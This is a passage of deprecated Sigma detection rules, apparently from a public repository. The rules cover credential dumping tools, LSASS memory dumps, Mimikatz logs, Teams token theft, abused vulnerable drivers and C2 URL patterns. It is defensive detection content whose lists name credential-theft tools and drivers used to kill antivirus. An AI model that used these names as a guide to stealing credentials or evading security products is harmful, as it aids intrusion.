https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile author: Markus Neis date: 2019/11/12 
modified: 2024/02/15 tags: - attack.defense_evasion - attack.command_and_control - attack.t1071.001 logsource: category: proxy detection: selection: cs-method: 'GET' c-uri|endswith: '\?manifest=wac' cs-host: 'onedrive.live.com' filter: c-uri|startswith: 'http' c-uri|contains: '://onedrive.live.com/' condition: selection and not filter falsepositives: - Unknown level: high ================================================ FILE: deprecated/web/proxy_ios_implant.yml ================================================ title: iOS Implant URL Pattern id: e06ac91d-b9e6-443d-8e5b-af749e7aa6b6 status: deprecated # Deprecated because it relates to iOS, so logging will vary, and it is old description: Detects the URL pattern used by the iOS implant references: - https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html - https://twitter.com/craiu/status/1167358457344925696 author: Florian Roth (Nextron Systems) date: 2019/08/30 modified: 2024/02/26 tags: - attack.execution - attack.t1203 - attack.collection - attack.t1005 - attack.t1119 - attack.credential_access - attack.t1528 - attack.t1552.001 logsource: category: proxy detection: selection: c-uri|contains: '/list/suc\?name=' condition: selection fields: - ClientIP - c-uri - c-useragent falsepositives: - Unknown level: critical ================================================ FILE: deprecated/web/proxy_webdav_search_ms.yml ================================================ title: Search-ms and WebDAV Suspicious Indicators in URL id: 5039f3d2-406a-4c1a-9350-7a5a85dc84c2 status: deprecated # See https://github.com/SigmaHQ/sigma/pull/4845 description: Detects URL patterns used by search(-ms)/WebDAV initial access campaigns. 
references: - https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html - https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462 author: Micah Babinski date: 2023/08/21 modified: 2024/05/10 tags: - attack.initial_access - attack.t1584 - attack.t1566 logsource: category: proxy detection: selection_search_ms: c-uri|contains|all: - 'search' # Matches on search:query= or search-ms:query= - ':query=' - 'webdav' selection_search_term: c-uri|contains: # Note: Add additional keywords for additional coverage - 'agreement' - 'invoice' - 'notice' - 'payment' filter_main_local_ips: dst_ip|cidr: - '127.0.0.0/8' - '10.0.0.0/8' - '172.16.0.0/12' - '192.168.0.0/16' - '169.254.0.0/16' - '::1/128' # IPv6 loopback - 'fe80::/10' # IPv6 link-local addresses - 'fc00::/7' # IPv6 private addresses condition: all of selection_* and not 1 of filter_main_* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/create_remote_thread_win_susp_remote_thread_target.yml ================================================ title: Suspicious Remote Thread Target id: f016c716-754a-467f-a39e-63c06f773987 status: deprecated description: | Offensive tradecraft is switching away from using APIs like "CreateRemoteThread"; however, this is still widely observed in the wild. This rule aims to detect suspicious processes (those we would not expect to behave in this way, such as winword.exe or outlook.exe) creating remote threads in other processes. It is a generic rule, but it should have a low false-positive ratio due to the selected range of processes. 
references: - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ author: Florian Roth (Nextron Systems) date: 2022/08/25 modified: 2023/05/05 logsource: product: windows category: create_remote_thread detection: selection: TargetImage|endswith: - '\spoolsv.exe' - '\notepad.exe' filter: - SourceImage|endswith: '\csrss.exe' - SourceImage|contains: 'unknown process' - StartFunction: 'EtwpNotificationThread' condition: selection and not filter fields: - ComputerName - User - SourceImage - TargetImage falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/driver_load_win_mal_creddumper.yml ================================================ title: Credential Dumping Tools Service Execution id: df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2 related: - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed type: derived status: deprecated description: Detects well-known credential dumping tools execution via service execution events references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 modified: 2023/12/11 tags: - attack.credential_access - attack.execution - attack.t1003.001 - attack.t1003.002 - attack.t1003.004 - attack.t1003.005 - attack.t1003.006 - attack.t1569.002 - attack.s0005 logsource: product: windows category: driver_load detection: selection: ImageLoaded|contains: - 'cachedump' - 'dumpsvc' - 'fgexec' - 'gsecdump' - 'mimidrv' - 'pwdump' - 'servpw' condition: selection falsepositives: - Legitimate Administrator using credential dumping tool for password recovery level: critical ================================================ FILE: deprecated/windows/driver_load_win_mal_poortry_driver.yml ================================================ title: Usage Of Malicious POORTRY Signed Driver 
id: 91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6 status: deprecated description: Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One. references: - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/16 modified: 2023/09/13 tags: - attack.privilege_escalation - attack.t1543 - attack.t1068 logsource: category: driver_load product: windows detection: selection_image: ImageLoaded|contains: - '\prokiller64.sys' - '\gftkyj64.sys' - '\KApcHelper_x64.sys' - '\NodeDriver.sys' - '\LcTkA.sys' selection_sysmon: Hashes|contains: - 'SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc' - 'SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c' - 'SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104' - 'SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c' - 'SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4' - 'SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497' - 'SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a' - 'SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d' - 'SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c' - 'SHA1=cc65bf60600b64feece5575f21ab89e03a728332' - 'SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e' - 'SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98' - 'MD5=10f3679384a03cb487bda9621ceb5f90' - 'MD5=04a88f5974caa621cee18f34300fc08a' - 'MD5=6fcf56f6ca3210ec397e55f727353c4a' - 'MD5=0f16a43f7989034641fd2de3eb268bf1' - 'MD5=ee6b1a79cb6641aa44c762ee90786fe0' - 'MD5=909f3fc221acbe999483c87d9ead024a' condition: 1 of selection* falsepositives: - Legitimate BIOS driver updates (should be rare) level: high ================================================ FILE: deprecated/windows/driver_load_win_powershell_script_installed_as_service.yml ================================================ title: PowerShell Scripts Run by a Services id: 
46deb5e1-28c9-4905-b2df-51cdcc9e6073 related: - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae type: derived status: deprecated description: Detects powershell script installed as a Service references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: oscd.community, Natalia Shornikova date: 2020/10/06 modified: 2023/12/11 tags: - attack.execution - attack.t1569.002 logsource: product: windows category: driver_load detection: selection: ImageLoaded|contains: - 'powershell' - 'pwsh' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/driver_load_win_vuln_avast_anti_rootkit_driver.yml ================================================ title: Vulnerable AVAST Anti Rootkit Driver Load id: 7c676970-af4f-43c8-80af-ec9b49952852 status: deprecated description: Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products references: - https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/ author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/28 modified: 2023/09/12 tags: - attack.privilege_escalation - attack.t1543.003 logsource: product: windows category: driver_load detection: selection_sysmon: Hashes|contains: - 'MD5=a179c4093d05a3e1ee73f6ff07f994aa' - 'SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' - 'SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1' driver_img: ImageLoaded|endswith: '\aswArPot.sys' driver_status: - Signed: 'false' - SignatureStatus: Expired condition: selection_sysmon or all of driver_* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/driver_load_win_vuln_dell_driver.yml ================================================ title: Vulnerable Dell BIOS Update Driver Load id: 21b23707-60d6-41bb-96e3-0f0481b0fed9 
status: deprecated description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551 references: - https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/ author: Florian Roth (Nextron Systems) date: 2021/05/05 modified: 2023/09/12 tags: - attack.privilege_escalation - cve.2021.21551 - attack.t1543 - attack.t1068 logsource: category: driver_load product: windows detection: selection_image: ImageLoaded|contains: '\DBUtil_2_3.Sys' selection_sysmon: Hashes|contains: - 'SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5' - 'SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1' - 'SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD' - 'SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25' - 'MD5=C996D7971C49252C582171D9380360F2' - 'MD5=D2FD132AB7BBC6BBB87A84F026FA0244' condition: 1 of selection* falsepositives: - Legitimate BIOS driver updates (should be rare) level: high ================================================ FILE: deprecated/windows/driver_load_win_vuln_drivers_names.yml ================================================ title: Vulnerable Driver Load By Name id: 839f1ee1-292d-495a-bf37-818267b8ee82 related: - id: 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8 type: derived status: deprecated description: Detects the load of known vulnerable drivers via their names only. 
references: - https://loldrivers.io/ author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/03 modified: 2023/09/03 tags: - attack.privilege_escalation - attack.t1543.003 - attack.t1068 logsource: product: windows category: driver_load detection: selection: ImageLoaded|endswith: - '\reddriver.sys' - '\mhyprot2.sys' - '\hwos2ec7x64.sys' - '\asrdrv103.sys' - '\e29f6311ae87542b3d693c1f38e4e3ad.sys' - '\gvcidrv64.sys' - '\spwizimgvt.sys' - '\hwos2ec10x64.sys' - '\e939448b28a4edc81f1f974cebf6e7d2.sys' - '\phymemx64.sys' - '\dh_kernel.sys' - '\bs_def.sys' - '\nbiolib_x64.sys' - '\viraglt64.sys' - '\ntiolib.sys' - '\paniox64.sys' - '\libnicm.sys' - '\phymem64.sys' - '\fiddrv.sys' - '\cpuz141.sys' - '\yyprotect64.sys' - '\daxin_blank3.sys' - '\aswarpot.sys' - '\t8.sys' - '\driver7-x86-withoutdbg.sys' - '\dcr.sys' - '\b3.sys' - '\asupio.sys' - '\blackbonedrv10.sys' - '\rzpnk.sys' - '\iomem64.sys' - '\kfeco11x64.sys' - '\t.sys' - '\wantd.sys' - '\mimikatz.sys' - '\wantd_4.sys' - '\chaos-rootkit.sys' - '\mhyprot.sys' - '\nlslexicons0024uvn.sys' - '\piddrv64.sys' - '\aswvmm.sys' - '\superbmc.sys' - '\kprocesshacker.sys' - '\lmiinfo.sys' - '\jokercontroller.sys' - '\blackbone.sys' - '\fur.sys' - '\vboxmousent.sys' - '\mapmom.sys' - '\windows-xp-64.sys' - '\d3.sys' - '\inpout32.sys' - '\tfbfs3ped.sys' - '\etdsupp.sys' - '\asmmap64.sys' - '\lurker.sys' - '\alsysio64.sys' - '\ntiolib_x64.sys' - '\asas.sys' - '\vproeventmonitor.sys' - '\dbutil_2_3.sys' - '\malicious.sys' - '\cpupress.sys' - '\netfilter2.sys' - '\wintapix.sys' - '\mhyprotnap.sys' - '\ktes.sys' - '\titidrv.sys' - '\rtcore64.sys' - '\physmem.sys' - '\d.sys' - '\asrdrv106.sys' - '\winiodrv.sys' - '\phlashnt.sys' - '\sfdrvx64.sys' - '\ene.sys' - '\nqrmq.sys' - '\phydmaccx86.sys' - '\fd3b7234419fafc9bdd533f48896ed73_b816c5cd.sys' - '\magdrvamd64.sys' - '\a26363e7b02b13f2b8d697abb90cd5c3.sys' - '\amdryzenmasterdriver.sys' - '\amigendrv64.sys' - '\d2.sys' - '\agent64.sys' - '\bs_rcio64.sys' - '\goad.sys' - 
'\bsmi.sys' - '\nvflsh64.sys' - '\gametersafe.sys' - '\ndislan.sys' - '\bw.sys' - '\directio32.sys' - '\asrsmartconnectdrv.sys' - '\ktgn.sys' - '\eneio64.sys' - '\amp.sys' - '\gdrv.sys' - '\tmel.sys' - '\nstr.sys' - '\winring0.sys' - '\fiddrv64.sys' - '\tmcomm.sys' - '\daxin_blank2.sys' - '\poortry2.sys' - '\bsmemx64.sys' - '\asio.sys' - '\gmer64.sys' - '\panio.sys' - '\ucorew64.sys' - '\atszio64.sys' - '\nt2.sys' - '\pciecubed.sys' - '\nvflsh32.sys' - '\ssport.sys' - '\wcpu.sys' - '\winio64.sys' - '\msio64.sys' - '\black.sys' - '\nicm.sys' - '\daxin_blank1.sys' - '\my.sys' - '\tgsafe.sys' - '\dbk64.sys' - '\proxydrv.sys' - '\1fc7aeeff3ab19004d2e53eae8160ab1.sys' - '\capcom.sys' - '\asio32.sys' - '\proxy32.sys' - '\asrdrv102.sys' - '\vboxguest.sys' - '\vboxtap.sys' - '\daxin_blank.sys' - '\poortry.sys' - '\ntbios.sys' - '\glckio2.sys' - '\dbutildrv2.sys' - '\kfeco10x64.sys' - '\lenovodiagnosticsdriver.sys' - '\netfilter.sys' - '\corsairllaccess64.sys' - '\semav6msr.sys' - '\bs_rciow1064.sys' - '\vboxusbmon.sys' - '\nodedriver.sys' - '\iobitunlocker.sys' - '\smep_namco.sys' - '\asio64.sys' - '\xjokercontroller.sys' - '\irec.sys' - '\asribdrv.sys' - '\mhyprot3.sys' - '\daxin_blank6.sys' - '\fidpcidrv.sys' - '\bandai.sys' - '\procexp.sys' - '\daxin_blank5.sys' - '\daxin_blank4.sys' - '\bedaisy.sys' - '\asrdrv10.sys' - '\bwrsh.sys' - '\eio.sys' - '\winio64a.sys' - '\citmdrv_ia64.sys' - '\7.sys' - '\b.sys' - '\bwrs.sys' - '\nt3.sys' - '\wiseunlo.sys' - '\ncpl.sys' - '\ctiio64.sys' - '\hw.sys' - '\asromgdrv.sys' - '\bs_hwmio64.sys' - '\lgdatacatcher.sys' - '\rtkio.sys' - '\winio32.sys' - '\phydmaccx64.sys' - '\mtcbsv64.sys' - '\ni.sys' - '\b4.sys' - '\directio64.sys' - '\vboxdrv.sys' - '\nvflash.sys' - '\hpportiox64.sys' - '\bs_i2c64.sys' - '\iomap64.sys' - '\vboxusb.sys' - '\msqpq.sys' - '\sysinfo.sys' - '\mhyprotect.sys' - '\naldrv.sys' - '\lgdcatcher.sys' - '\echo_driver.sys' - '\otipcibus.sys' - '\testbone.sys' - '\lctka.sys' - '\wyproxy64.sys' - '\pchunter.sys' - 
'\amdpowerprofiler.sys' - '\wantd_3.sys' - '\test2.sys' - '\rtcoremini64.sys' - '\d4.sys' - '\piddrv.sys' - '\panmonflt.sys' - '\windows8-10-32.sys' - '\wantd_5.sys' - '\mjj0ge.sys' - '\kt2.sys' - '\rtkiow8x64.sys' - '\nstrwsk.sys' - '\msio32.sys' - '\ktmutil7odm.sys' - '\hwrwdrv.sys' - '\nchgbios2x64.sys' - '\bs_hwmio64_w10.sys' - '\mydrivers.sys' - '\t7.sys' - '\wantd_6.sys' - '\sandra.sys' - '\atillk64.sys' - '\cpuz.sys' - '\netproxydriver.sys' - '\protects.sys' - '\asrrapidstartdrv.sys' - '\dh_kernel_10.sys' - '\ef0e1725aaf0c6c972593f860531a2ea.sys' - '\enetechio64.sys' - '\citmdrv_amd64.sys' - '\iqvw64e.sys' - '\bsmixp64.sys' - '\bs_i2cio.sys' - '\prokiller64.sys' - '\netflt.sys' - '\4748696211bd56c2d93c21cab91e82a5.sys' - '\openlibsys.sys' - '\adv64drv.sys' - '\be6318413160e589080df02bb3ca6e6a.sys' - '\cupfixerx64.sys' - '\se64a.sys' - '\speedfan.sys' - '\a236e7d654cd932b7d11cb604629a2d0.sys' - '\winio32b.sys' - '\winio64b.sys' - '\sysdrv3s.sys' - '\lv561av.sys' - '\bs_def64.sys' - '\mlgbbiicaihflrnh.sys' - '\dbutil.sys' - '\834761775.sys' - '\kdriver.sys' - '\spf.sys' - '\dkrtk.sys' - '\bs_flash64.sys' - '\nt4.sys' - '\4.sys' - '\directio32_legacy.sys' - '\viragt64.sys' - '\hostnt.sys' - '\poortry1.sys' - '\c94f405c5929cfcccc8ad00b42c95083.sys' - '\b1.sys' - '\wantd_2.sys' - '\mhyprotrpg.sys' - '\nscm.sys' - '\smep_capcom.sys' - '\sense5ext.sys' - '\lha.sys' - '\atszio.sys' - '\amifldrv64.sys' - '\blacklotus_driver.sys' - '\asrautochkupddrv.sys' - '\cpuz_x64.sys' - '\asrautochkupddrv_1_0_32.sys' - '\bs_rcio.sys' - '\elbycdio.sys' - '\fidpcidrv64.sys' - '\elrawdsk.sys' - '\telephonuafy.sys' - '\rwdrv.sys' - '\lgcoretemp.sys' - '\segwindrvx64.sys' - '\windows7-32.sys' - '\asrsetupdrv103.sys' - '\hwinfo32.sys' - '\inpoutx64.sys' - '\asrdrv101.sys' - '\asupio64.sys' - '\monitor_win10_x64.sys' - '\msrhook.sys' - '\nt5.sys' - '\wfshbr64.sys' - '\driver7.sys' - '\sfdrvx32.sys' - '\asrdrv104.sys' - '\gameink.sys' - '\hwinfo64i.sys' - '\bsmix64.sys' - '\winio32a.sys' 
- '\kbdcap64.sys' - '\5a4fe297c7d42539303137b6d75b150d.sys' - '\fairplaykd.sys' - '\a9df5964635ef8bd567ae487c3d214c4.sys' - '\fgme.sys' - '\skill.sys' - '\capcom2.sys' - '\typelibde.sys' - '\nt6.sys' - '\winio64c.sys' - '\driver7-x64.sys' - '\air_system10.sys' - '\panmonfltx64.sys' - '\ntbios_2.sys' - '\viragt.sys' - '\zam64.sys' - '\vmdrv.sys' - '\iqvw64.sys' - '\1.sys' - '\t3.sys' - '\2.sys' - '\gftkyj64.sys' - '\proxy64.sys' - '\kevp64.sys' - '\netfilterdrv.sys' - '\4118b86e490aed091b1a219dba45f332.sys' - '\6771b13a53b9c7449d4891e427735ea2.sys' - '\mimidrv.sys' - '\driver7-x86.sys' - '\windbg.sys' - '\80.sys' - '\directio.sys' - '\atomicredteamcapcom.sys' - '\81.sys' - '\full.sys' - '\asrdrv.sys' - '\kapchelper_x64.sys' - '\c.sys' - '\winflash64.sys' - '\amsdk.sys' condition: selection falsepositives: - False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non-vulnerable version. 
- If you experience a lot of FP you could comment out the driver name or its exact known legitimate location (when possible) level: low ================================================ FILE: deprecated/windows/driver_load_win_vuln_gigabyte_driver.yml ================================================ title: Vulnerable GIGABYTE Driver Load id: 7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647 status: deprecated description: Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation references: - https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b - https://twitter.com/malmoeb/status/1551449425842786306 - https://github.com/fengjixuchui/gdrv-loader - https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details - https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details author: Florian Roth (Nextron Systems) date: 2022/07/25 modified: 2023/09/12 tags: - attack.privilege_escalation - attack.t1543.003 logsource: product: windows category: driver_load detection: selection: Hashes|contains: - 'MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3' - 'MD5=C832A4313FF082258240B61B88EFA025' - 'SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39' - 'SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46' - 'SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427' - 'SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/driver_load_win_vuln_hw_driver.yml ================================================ title: Vulnerable HW Driver Load id: 9bacc538-d1b9-4d42-862e-469eafc05a41 status: deprecated description: Detects the load of a legitimate signed driver named HW.sys that is often used by threat actors or malware for privilege escalation references: 
- https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/ - https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details author: Florian Roth (Nextron Systems) date: 2022/07/26 modified: 2023/09/12 tags: - attack.privilege_escalation - attack.t1543.003 logsource: product: windows category: driver_load detection: selection_name: ImageLoaded|endswith: '\HW.sys' selection_sysmon: Hashes|contains: - 'SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8' - 'SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA' - 'SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5' - 'SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57' - 'SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD' - 'SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A' - 'MD5=3247014BA35D406475311A2EAB0C4657' - 'MD5=376B1E8957227A3639EC1482900D9B97' - 'MD5=45C2D133D41D2732F3653ED615A745C8' condition: 1 of selection* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/driver_load_win_vuln_lenovo_driver.yml ================================================ title: Vulnerable Lenovo Driver Load id: ac683a42-877b-4ff8-91ac-69e94b0f70b4 status: deprecated description: Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges references: - https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities - https://github.com/alfarom256/CVE-2022-3699/ author: Florian Roth (Nextron Systems) date: 2022/11/10 modified: 2023/09/12 tags: - attack.privilege_escalation - cve.2021.21551 - attack.t1543 logsource: category: driver_load product: windows detection: selection: Hashes|contains: - 'SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE' - 'SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F' - 'MD5=B941C8364308990EE4CC6EADF7214E0F' 
condition: selection falsepositives: - Legitimate driver loads (old driver that didn't receive an update) level: high ================================================ FILE: deprecated/windows/file_event_win_access_susp_teams.yml ================================================ title: Suspicious File Event With Teams Objects id: 6902955a-01b7-432c-b32a-6f5f81d8f624 status: deprecated description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. references: - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens author: '@SerkinValery' date: 2022/09/16 modified: 2024/07/22 tags: - attack.credential_access - attack.t1528 logsource: product: windows category: file_event detection: selection: TargetFilename|contains: - '\Microsoft\Teams\Cookies' - '\Microsoft\Teams\Local Storage\leveldb' filter: Image|contains: '\Microsoft\Teams\current\Teams.exe' condition: selection and not filter falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/file_event_win_access_susp_unattend_xml.yml ================================================ title: Suspicious Unattend.xml File Access id: 1a3d42dd-3763-46b9-8025-b5f17f340dfb status: deprecated description: | Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. 
They are used to store credentials/answers during the unattended windows install process references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md author: frack113 date: 2021/12/19 modified: 2024/07/22 tags: - attack.credential_access - attack.t1552.001 logsource: product: windows category: file_event detection: selection: TargetFilename|endswith: '\unattend.xml' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/file_event_win_crackmapexec_patterns.yml ================================================ title: CrackMapExec File Creation Patterns id: 9433ff9c-5d3f-4269-99f8-95fc826ea489 status: deprecated description: Detects suspicious file creation patterns found in logs when CrackMapExec is used references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass author: Florian Roth (Nextron Systems) date: 2022/03/12 modified: 2024/03/01 tags: - attack.credential_access - attack.t1003.001 logsource: product: windows category: file_event detection: selection_lsass_dump1: TargetFilename|startswith: 'C:\Windows\Temp\' Image: 'C:\WINDOWS\system32\rundll32.exe' User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' TargetFilename|endswith: - '.rtf' - '.otf' - '.odt' - '.txt' - '.doc' - '.pdf' - '.dll' - '.docx' - '.wpd' - '.icns' - '.db' - '.ini' - '.tex' - '.sys' - '.csv' - '.fon' - '.tar' - '.ttf' - '.xml' - '.cfg' - '.cpl' - '.jpg' - '.drv' - '.cur' - '.tmp' # list is incomplete selection_procdump: TargetFilename: 'C:\Windows\Temp\procdump.exe' User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' condition: 1 of selection* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/file_event_win_hktl_createminidump.yml ================================================ title: CreateMiniDump 
Hacktool id: db2110f3-479d-42a6-94fb-d35bc1e46492 status: deprecated related: - id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d type: derived description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine author: Florian Roth (Nextron Systems) references: - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass date: 2019/12/22 modified: 2022/05/14 tags: - attack.credential_access - attack.t1003.001 logsource: product: windows category: file_event detection: selection: TargetFilename|endswith: '\lsass.dmp' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/file_event_win_lsass_memory_dump_file_creation.yml ================================================ title: LSASS Memory Dump File Creation id: 5e3d3601-0662-4af0-b1d2-36a05e90c40a status: deprecated description: LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community date: 2019/10/22 modified: 2023/08/29 tags: - attack.credential_access - attack.t1003.001 logsource: category: file_event product: windows detection: selection: TargetFilename|contains: 'lsass' TargetFilename|endswith: 'dmp' condition: selection fields: - ComputerName - TargetFilename falsepositives: - Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic investigator - Dumps of another process that contains lsass in its process name (substring) level: high ================================================ FILE: deprecated/windows/file_event_win_mimikatz_memssp_log_file.yml ================================================ title: Mimikatz MemSSP Default Log File Creation id: 034affe8-6170-11ec-844f-0f78aa0c4d66 related: - id: 9e099d99-44c2-42b6-a6d8-54c3545cab29 # Replacement for this rule type: similar status: deprecated description: Detects Mimikatz MemSSP default log file creation references: - https://pentestlab.blog/2019/10/21/persistence-security-support-provider/ author: David ANDRE date: 2021/12/20 modified: 2023/02/16 tags: - attack.credential_access - attack.t1003 logsource: product: windows category: file_event detection: selection: TargetFilename|endswith: 'mimilsa.log' condition: selection falsepositives: - Unlikely level: critical ================================================ FILE: deprecated/windows/file_event_win_office_outlook_rdp_file_creation.yml ================================================ title: .RDP File Created by Outlook Process id: f748c45a-f8d3-4e6f-b617-fe176f695b8f related: - id: fccfb43e-09a7-4bd2-8b37-a5a7df33386d type: derived status: deprecated description: | Detects the creation of files with the ".rdp" extensions in the temporary directory that Outlook uses when 
opening attachments. This can be used to detect spear-phishing campaigns that use RDP files as attachments. references: - https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/ - https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/ - https://www.linkedin.com/feed/update/urn:li:ugcPost:7257437202706493443?commentUrn=urn%3Ali%3Acomment%3A%28ugcPost%3A7257437202706493443%2C7257522819985543168%29&dashCommentUrn=urn%3Ali%3Afsd_comment%3A%287257522819985543168%2Curn%3Ali%3AugcPost%3A7257437202706493443%29 author: Florian Roth date: 2024-11-01 modified: 2025-07-22 tags: - attack.defense-evasion logsource: product: windows category: file_event detection: selection_extension: TargetFilename|endswith: '.rdp' selection_location: - TargetFilename|contains: - '\AppData\Local\Packages\Microsoft.Outlook_' # New Outlook - '\AppData\Local\Microsoft\Olk\Attachments\' # New Outlook - TargetFilename|contains|all: - '\AppData\Local\Microsoft\Windows\' - '\Content.Outlook\' condition: all of selection_* falsepositives: - Whenever someone receives an RDP file as an email attachment and decides to save or open it right from the attachments level: high ================================================ FILE: deprecated/windows/file_event_win_susp_clr_logs.yml ================================================ title: Suspicious CLR Logs Creation id: e4b63079-6198-405c-abd7-3fe8b0ce3263 status: deprecated description: Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly. 
